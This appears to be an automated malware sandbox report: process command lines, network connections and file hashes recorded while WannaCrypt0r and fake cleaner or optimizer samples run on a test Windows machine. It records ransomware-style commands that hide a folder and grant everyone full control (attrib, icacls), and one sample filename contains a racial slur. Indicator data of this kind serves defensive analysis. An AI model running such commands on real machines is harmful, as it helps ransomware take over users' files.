"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,9090370486523617369,2003826429832243097,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1848 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1884,9090370486523617369,2003826429832243097,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1884,9090370486523617369,2003826429832243097,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,9090370486523617369,2003826429832243097,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,9090370486523617369,2003826429832243097,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1

C:\Windows\SysWOW64\werfault.exe

werfault.exe /h /shared Global\db8ebffdf2d4405d9bfca2398fad1b18 /t 9696 /p 9692

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\WannaCrypt0r.zip"

C:\Program Files (x86)\Registry Cleaner Trial\RegClean.exe

"C:\Program Files (x86)\Registry Cleaner Trial\RegClean.exe"

C:\Users\Admin\Desktop\NIGGARAP.exe

"C:\Users\Admin\Desktop\NIGGARAP.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

Network

Country Destination Domain Proto
N/A 127.0.0.1:49791 tcp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 avatars.githubusercontent.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 140.82.114.21:443 collector.github.com tcp
US 140.82.114.21:443 collector.github.com tcp
US 140.82.114.21:443 collector.github.com tcp
GB 20.26.156.210:443 api.github.com tcp
N/A 127.0.0.1:49798 tcp
GB 88.221.134.155:80 ciscobinary.openh264.org tcp
NL 142.250.179.174:443 redirector.gvt1.com tcp
NL 142.250.179.174:443 redirector.gvt1.com udp
DE 74.125.111.136:443 r3---sn-4g5edn6k.gvt1.com tcp
DE 74.125.111.136:443 r3---sn-4g5edn6k.gvt1.com udp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 35.190.72.216:443 prod.classify-client.prod.webservices.mozgcp.net udp
GB 20.26.156.215:443 github.com tcp
US 140.82.114.21:443 collector.github.com tcp
US 185.199.110.133:443 avatars.githubusercontent.com tcp
US 185.199.110.133:443 avatars.githubusercontent.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.133:443 avatars.githubusercontent.com tcp
US 185.199.110.133:443 avatars.githubusercontent.com tcp
NL 142.250.179.196:443 www.google.com tcp
NL 142.250.179.196:443 www.google.com tcp
NL 142.250.179.196:443 www.google.com udp
DE 49.12.202.237:80 7zip.org tcp
DE 49.12.202.237:80 7zip.org tcp
DE 49.12.202.237:443 7zip.org tcp
DE 49.12.202.237:443 7zip.org tcp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 avatars.githubusercontent.com tcp
US 140.82.114.22:443 collector.github.com tcp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 22.114.82.140.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 185.199.110.133:443 avatars.githubusercontent.com tcp
US 185.199.110.133:443 avatars.githubusercontent.com tcp
DE 49.12.202.237:443 7-zip.org tcp
US 8.8.8.8:53 7-zip.org udp
US 8.8.8.8:53 7-zip.org udp
DE 49.12.202.237:443 7-zip.org tcp
US 8.8.8.8:53 adserver.sharewareonline.com udp
US 13.248.169.48:80 mail.softwareonline.com tcp
NL 212.32.237.90:80 adserver.sharewareonline.com tcp
NL 212.32.237.90:80 adserver.sharewareonline.com tcp
US 8.8.8.8:53 90.237.32.212.in-addr.arpa udp
US 8.8.8.8:53 48.169.248.13.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 glb-db52c2cf8be544.github.com udp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 glb-db52c2cf8be544.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 ts.gator.com udp
US 8.8.8.8:53 ts.gator.com udp
US 8.8.8.8:53 updateserver.cpurocket.com udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 github.com udp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.133:443 avatars.githubusercontent.com tcp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 glb-db52c2cf8be544.github.com udp
US 8.8.8.8:53 glb-db52c2cf8be544.github.com udp
US 8.8.8.8:53 store.sharewareonline.com udp
US 8.8.8.8:53 api.github.com udp
NL 212.32.237.90:443 store.sharewareonline.com tcp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.133:443 avatars.githubusercontent.com tcp
US 45.62.255.25:443 tcp
US 128.31.0.39:9101 tcp
GB 178.62.60.37:443 tcp
FR 163.172.157.213:443 tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.githubassets.com udp
SE 185.97.32.18:9001 tcp
NL 194.109.206.212:443 tcp
SE 171.25.193.9:80 tcp
PL 45.141.215.85:143 tcp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 glb-db52c2cf8be544.github.com udp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 glb-db52c2cf8be544.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 9.193.25.171.in-addr.arpa udp
US 8.8.8.8:53 85.215.141.45.in-addr.arpa udp
US 8.8.8.8:53 ts.gator.com udp
US 8.8.8.8:53 ts.gator.com udp
BO 200.87.164.69:9999 tcp
US 8.8.8.8:53 google.com udp
NL 172.217.23.206:80 google.com tcp
BO 200.87.164.69:9999 tcp
NL 172.217.23.206:80 google.com tcp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 glb-db52c2cf8be544.github.com udp
US 8.8.8.8:53 glb-db52c2cf8be544.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 api.github.com udp
BO 200.119.204.12:9999 tcp
BO 200.119.204.12:9999 tcp
BO 190.186.45.170:9999 tcp
BO 190.186.45.170:9999 tcp

Files

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\datareporting\glean\pending_pings\df7bdd05-11ee-4538-b08d-71fc085dbb55

MD5 4162ae24bb69de2ec10ac82fd9ba4228
SHA1 942f3cf94cbcc1f6de961d794dcbe32036287220
SHA256 1c9f07694da14620834f3b744f9935d7e1c0ccbef3fdc8ec73ef0b85019221ff
SHA512 480a32a5210cf43d24b4c4fb8913041c22e1fd94b147c6f3befa6e4534bad6985d7c009908a7fbaae62e5d7ebc73d37d02bbcfa44ba5917ca7885328b2cfba53

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\datareporting\glean\pending_pings\d0b2fd72-0a02-44ad-ac9f-c829050aa7f1

MD5 47996c35c6569aceb3b26b7a6114f14b
SHA1 7b2a6a80962c0a6429e8cdf83872e2cab50c85a3
SHA256 6e7fec96323fdb16c9ec0a711195a5215732ef10bbff19e6d379b447973c9cbe
SHA512 07c6f53ff4429c9e79c961ec9a8c644f1c367560bf01936e4b879adcd87d5b44a3c509a4276d7d2a8b5f4ffcad75fd127fd08add0c54ddc5b9d1e02bf0e75c4d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\datareporting\glean\pending_pings\3896854a-eee8-4695-b429-d069e7a093d2

MD5 625009cc3ec641ae87a4279bb993a6aa
SHA1 46ffb85be4e6f659f6d3f47ec6c083faabb9a47f
SHA256 8ebece4da553ea88c8668e165d6754233aa5857c6b086d54b2c8d5b2bd76eec7
SHA512 61b5d4244afd253f86c2224edaf1f25a96a617a84c722490d8d7ec619ef8789e0c78717a5ee5f208d269249728a95466bfcb4de97c95727a5ffaccb158313fdf

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\datareporting\glean\db\data.safe.tmp

MD5 d8f12c380404694f3f47b73f13cf63f8
SHA1 228a63dbca4ada719f2fc48c74b41936f24dbb10
SHA256 7ce8d2037900b6f60b455535d6c9bde2e831f35173412413d93aeb81e10a7abc
SHA512 0bd5558dc6fdfc9ff9270021871f043783594e43c2e0ed3d9bb21fe4687c8ec9eacaaf4eabd758d6d71a30c2fc2f050d322c55cb029502c09dca97ee3e37a51c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\datareporting\glean\db\data.safe.tmp

MD5 e49a7a392a62ecc206c52cb70f831cae
SHA1 93b44988d6414185811fcbad3778d5225f7dcaac
SHA256 4f6c579b321d75dbfdf7bd04bab5f355a461d55712542e8725fd8f6f8e35bb78
SHA512 5046fefe77dacc6ef6ea2f12935f6ee525fffb13a336028c1bedcc28bdf5e7d9d145bb20c200a20c4b919448643acae2ba0056e70cbc792a661378ba6b1cc91b

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\9lt6socl.default-release\activity-stream.discovery_stream.json

MD5 3a2173d0683fe53af7b43a688d418311
SHA1 333a2578e174d61b667a74720e5af3e4f691cab6
SHA256 67ab5532e7febfd1741247e868ac05525d9dc556f04175432b5ff9ab8d52d4c5
SHA512 3aabb2ed8d74aec2ecfdad646d0bd22cb34a51ff57aef08daccbe4e9c3f0818b405c17c133c2be39cc7cc32e7fc3b37ca6fd45349feef8c67e8b040b11acb1f9

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\prefs.js

MD5 d5ececc2e590a8fb49b7f2eea4a06354
SHA1 8c880b2340d2d0181bd5ec2f1e07a5bd9d8f8187
SHA256 3896ef1055dd203c8112a4b4daf54dcd04e85cfe3b98b5452d3205a2cfaca456
SHA512 81ab5cf84fa4de1280f5b45afbb582ac4dfe2df399c0e5ca4c5b6217dc80871c2092af5ce0c0c6dff310c0a8eeb3f738715046a8ca9b8dcec2063bf9ca84d226

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\datareporting\glean\db\data.safe.tmp

MD5 488c16fa82a44aa415153a30d084e168
SHA1 d614c8671c673e22b91b330c4e01fd1f4a6c07f5
SHA256 63c40beda6fbe83e93d45f0a0e5453a968fe4aef67cf39123131595a51043b16
SHA512 b1adaa181ce543686f0f3e56d1926453c5464a9bd8b5ce7d3e4ecf6f3f3d3fa9e805a9f3aa33b91a85c6351cba71a27570bcadeb5770e44e0485f2ae7d9cc26c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\prefs.js

MD5 8c0c8378ea746a526649bf62a1fdf65e
SHA1 afed740c79e70a82f787d89fe7542d49dc3c0125
SHA256 a3797a505283c475d72722dd5ed867a6e054a72c0c2d8e019d53c556deef25da
SHA512 1e4c8d0919ed892c380ce582515386238c64101cdeb3bdf1875a9b1616d9718ca4cb7ba62b8208e923f5b473c6d523165333478e5811487777be60f769c69ab7

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\9lt6socl.default-release\cache2\entries\E449899591A9BC91DFBA673EC0589B51E541A88B

MD5 2f3a62a7969f5a44d0434d6fd7ccd9ff
SHA1 3c8b3ff37a978e8cdca137cec220bb944a290fde
SHA256 7d0f9644797e0408ca4c1b1194ecb76aa3dd6754b78bd582e3af605975eeb325
SHA512 b977294007c7041371297c9089a578fdb196953f15656d8b1d272921059fab993db1c10893a023f63a58b688702f4f7ce0b52b69d924a85b4b784b1eb6103032

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\AlternateServices.bin

MD5 88a7852f574cf417a0d2bd51ac4ed55e
SHA1 89b597cfc9f080d946f62f09d87e62d43980b7b9
SHA256 cc7abe03c90ce8d81bd603d7cb5840762ccbb0f4e36fdff76fb284e25177d7c6
SHA512 9accad3235a6823f9c36ce2ef70280f31c8d72bfea40e9b8b296279f5c552a5871bc072331426f2de94d2c697d2c04bbe06c551ec66c90a724ff2e52da167935

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\prefs-1.js

MD5 867099db4b40db024d68b5e6e054f7d0
SHA1 d3dc6d8668b997327d81f8b4b78de0b26ee3277e
SHA256 04e248ab05969137c284d30703bbdc5b58811f50ab3ce020badf8b0e56bbe790
SHA512 be5325bb4d20b274feca97e6f4a43c4d2c6fc9f3a4c581a1d2f19a52e5602228adf0a18367ca4971237142b32ff5d19dc2c0601f7a12e69cd45b57df54eb4500

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 e8c30909a2950f8d9675fab1ef416f36
SHA1 dfd7e199011c8fb42ae12a90c781c870a6d09429
SHA256 5ef7ad528be06dd8b7ed9effde63e26bd019826edeb585bec7d169570b365927
SHA512 7edde3bcde60228fb836103230f57f07c657cedc5d713d45b682864d27846f44e4c73ca64d59b752a8e71279c38ff2d2c1f7ddf0620b9786812c75a7a237f7a3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 4a3b24d6ddbe3d16fb94c0a3ed4f72a4
SHA1 fc2e82dea27e3a70d69f92f090750e2e1d012604
SHA256 34ab9b23cbadf7f68f0433cb5a1aad321de17c895db056d7f1a4427c5974247b
SHA512 5468c649603d2b2276733f3e5cc87e3154ebb51585f4ad2f2d5bea8a382cbea5010f446343aecc0a902f8547dcbd755e7cf1a2857216aca14dcd59b38a4c7087

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\prefs-1.js

MD5 15c3f7143f50de41bda107638aa86946
SHA1 06f808bb1f42763ea7d6015b94a81ad70fe74a32
SHA256 6f9a6376831ecd851891b1c2b0467b23d35a81b07d9239c52bd5933a93eecabb
SHA512 cbd2be73ea3bb509bb4eda725ab49d09e7f9412afc9af02e6de74fec58a5327422b2b53294fb144fa44b8c4f532da1b1c6ac80cd986f3e935a78ebaf6241e2ad

C:\Users\Admin\Downloads\AdvancedSystemOptimizer.ufTeMA1_.7z.part

MD5 9c451b819786df8d31eae3387b5e4e3b
SHA1 de2a7741a52e9a3accd29b5c7df1c06fbb0f0ef2
SHA256 3c614c930ac65a06fbae126571ea951885450364e2847b3d7964d29233008765
SHA512 7632058fd9e99004707979e8a3dd38ca511e67f0d2ab9affd1478ded15103f86cbeac714ce05ab18f30807406ea5b524358792a40a1fd98154ec4f7140ec6b95

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\prefs-1.js

MD5 221b9fab19cfbf756b065ed90844b4cc
SHA1 9691771decc5b7b148b3c53134e8219c1677e33a
SHA256 02720769e33d8f01e7136caf062b7f5a32341a94a3c08d21a596362a5a0debf8
SHA512 8ca3a64a1694a7557bcc48f2c8bd098cdacdcfa4dd1bc1d87968f67e17d11958ceaacc14d0603abbbae75ed0da2416e9f878314b4c205e256e3f80871f58afd3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\sessionstore-backups\recovery.baklz4

MD5 6379a2115958d1ee8ab2ff9abd897243
SHA1 426c4efbe90fce9d6d685a1b36dc2523021a06cb
SHA256 aa4285bf4634ffd05863cf121b930320541e42fdbc1ccc2d7d5a6254279103a9
SHA512 6e4eddb48f7f228fe22e3ca2ce7ddd34e5c73afd894721d99bfe7a8bc47599902b450dd1ee186a3e9c26ecaabb9fa44bed6acfe3e5275b9f94c4123fff102d6e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\AlternateServices.bin

MD5 fbc5b354f5a1c87a77631325e509b827
SHA1 e08251e230e624d3a32e9dbf5c9c772887c5bb88
SHA256 1f3eecc44ec20b90388eaaec65cbde806503e1f262c551fa5c27a934fd15b812
SHA512 6c3339904812acbdd83a56ac31c1d01312fd07d972392b3c2cbc6e7352fd66eb6ce7e23ae4c578ad5bef899bdf1e516ada2fda5d31dee6234f38a0453b63469e

C:\Users\Admin\Downloads\7z2407-x64.dWdiufYS.exe.part

MD5 f1320bd826092e99fcec85cc96a29791
SHA1 c0fa3b83cf9f9ec5e584fbca4a0afa9a9faa13ed
SHA256 ad12cec3a3957ff73a689e0d65a05b6328c80fd76336a1b1a6285335f8dab1ba
SHA512 c6ba7770de0302dd90b04393a47dd7d80a0de26fab0bc11e147bf356e3e54ec69ba78e3df05f4f8718ba08ccaefbd6ea0409857973af3b6b57d271762685823a

C:\Users\Admin\Downloads\7z2407-x64.exe:Zone.Identifier

MD5 2129bca1bf0156fb4b3449a4ac86f163
SHA1 ebf76840f11c92eaa36331b5577b358f836436c9
SHA256 f16adbb41204975e2fc77e8fd529014a971acb49efe3aece5ac60c093197db5e
SHA512 926f18a86c752a8df7bce4a4455643d13aae9bb5e8ab15d681f6236b72b0393a871a0aa9dc3ad6223bc1a9e1779adb989d68c1615d7e2b6b02fe38bccd5967ba

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\sessionstore-backups\recovery.baklz4

MD5 5f95b53601fa5032e673b79dc1c72d3c
SHA1 8803974b34b35f773c52ab8a46002be3f767c6b5
SHA256 704978577a5b5e6dda9d16c91a98b2715252acd9f99876fffab26b5a6ad3a595
SHA512 0b4795cdd0c425bdf1259dbe04a95616b295373c2f3cddc2247d38e83c7c4145537c71bd85dbd7ec89ae43fb1c5e790a703cf70967615df4c418aa83ece14582

C:\Program Files\7-Zip\7-zip.dll

MD5 8af282b10fd825dc83d827c1d8d23b53
SHA1 17c08d9ad0fb1537c7e6cb125ec0acbc72f2b355
SHA256 1c0012c9785c3283556ac33a70f77a1bc6914d79218a5c4903b1c174aaa558ca
SHA512 cb6811df9597796302d33c5c138b576651a1e1f660717dd79602db669692c18844b87c68f2126d5f56ff584eee3c8710206265465583de9ec9da42a6ed2477f8

C:\Program Files\7-Zip\7zFM.exe

MD5 79e8ca28aef2f3b1f1484430702b24e1
SHA1 76087153a547ce3f03f5b9de217c9b4b11d12f22
SHA256 5bc65256b92316f7792e27b0111e208aa6c27628a79a1dec238a4ad1cc9530f7
SHA512 b8426b44260a3adcbeaa38c5647e09a891a952774ecd3e6a1b971aef0e4c00d0f2a2def9965ee75be6c6494c3b4e3a84ce28572e376d6c82db0b53ccbbdb1438

C:\Program Files\7-Zip\7z.dll

MD5 0009bd5e13766d11a23289734b383cbe
SHA1 913784502be52ce33078d75b97a1c1396414cf44
SHA256 3691adcefc6da67eedd02a1b1fc7a21894afd83ecf1b6216d303ed55a5f8d129
SHA512 d92cd55fcef5b15975c741f645f9c3cc53ae7cd5dffd5d5745adecf098b9957e8ed379e50f3d0855d54598e950b2dbf79094da70d94dfd7fc40bda7163a09b2b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\sessionstore-backups\recovery.baklz4

MD5 760a228deca77332bbc1305b0fddbfbb
SHA1 682ade6de991689fd3cb2a5a91bdc9f546e37807
SHA256 1e465353dbf56462268556211a9ff3b96805b20569710ed010396a974e570138
SHA512 0bf5609922b9c01976ec07ba947625f51cfadaa4e9689566ecbae54545cacad604e3167f4c9733334a0e04381f9d88c7e9bc7610a1de5ef3ea5f8e675f9e744c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\datareporting\glean\db\data.safe.tmp

MD5 bb71357df339f9fa7997c7d5e9dd519b
SHA1 a9b762f44ca22bba1877386924054e3b4b3a121f
SHA256 ac8f90654b78f1027539abb02dc11bfd803224bf3b03320ba6aad771e58cce8b
SHA512 46ecb33b367be1318729c084d00543b78371eb523bcceb0428c1ebd7cfa2c7740c1d2776d2db661e1291df144f7a6ecaad3e589b29d1e1fb3544cabfe8461996

C:\Users\Admin\Desktop\[email protected]

MD5 1f1d7b92e00983a27f1b19638c23aa52
SHA1 b6a0c7cc383a6134924ff55605f7d80db49a4da2
SHA256 e6411ae9f2dc1ce2d9932d5380552de1ca0f89e21f725ae4e4e7c882adf76b9f
SHA512 4b7f91a12d87991a6dea90bd69f401bdce727f89ee22d3a57e7ba95f9d488689b9ec625dde0ac5dd914e2592b4732dbb657107b5b4e88251b7cc93814d8ee214

memory/3400-3847-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-KE31S.tmp\is-SUFUB.tmp

MD5 b02d341610c254fc7ecafe4147ec5571
SHA1 e69745d27265ba283dae19be2f81db37df39ce30
SHA256 3c3887c918c3a4cf1ff482842c937ba4564ae8d2983413581e93ea2bf1812a6b
SHA512 f3c12f8532b73f5691bb7f64555a234ba881213e427ea4890286b447e014b7d13a48e3815c8f786639eb52bc4011ddec9ba87c18cae103b1f7d761002cff4d31

memory/3400-3856-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2768-3857-0x0000000000400000-0x000000000049D000-memory.dmp

memory/2768-3859-0x0000000000400000-0x000000000049D000-memory.dmp

memory/2768-3861-0x0000000000400000-0x000000000049D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PKPH6O3ECVNYBQ1W6MPG.temp

MD5 135e435a921cc5ee6c365a990aa96f5e
SHA1 70c4b34319d30c1b471e61baafa41181cc7764da
SHA256 94c48fe569793528b45fb8f327ceb88c6c077e7e825b2158a5aa3ac01bfdeaf4
SHA512 e4d7bb639e149fbe9ceb83eb4faea6f72693b6c564645ba796b0a0774f6b79670409bda747e62f0b1715859243e099e50fb0cf17b20fd59b8e904c826e5eff81

memory/2768-3891-0x0000000000400000-0x000000000049D000-memory.dmp

memory/3400-3892-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\Downloads\RegistryCleaner.Wca7GPNr.7z.part

MD5 7588b8c415ee78b80da1145ccdb28650
SHA1 a77e32746e0715b91b3cfda37a6484baed557adf
SHA256 4a828a1c5654f97854321d10c09c14e1038416e402198a2758e98fbbe99f69aa
SHA512 b1f6ff7947e421a1129cc1ac5b175cceef346b5d8b2ed95ec60b1afe3c14f949254ea7724ed70a079aa14ceeb4350c15f566b19c15cd2d3256a92b75edad27e0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9lt6socl.default-release\sessionstore-backups\recovery.baklz4

MD5 9b03b50d25288c775b6c0fc853f15b4d
SHA1 e9d9cd13d439abb646de7738f254f7354f78e431
SHA256 e383c2848748db059fe3243908db7f15b0dba3014c30c3884b58f8dc363077e4
SHA512 88aa4f6f1fb53573b7f89197c1dab175c475d3f461435a4a52d7e54bc2b5c801943e804d0446a292728210673cb303857d1f15093a1726abe65cd69dce48395c

C:\Users\Admin\AppData\Local\Temp\7zE896B600C\Endermanch@RegistryCleaner_HOI.exe

MD5 68f4424274c9d32143cdffc80d5b8b2a
SHA1 9f9d225ff4c38fbf48d31dbefd54c3a4d08b0acb
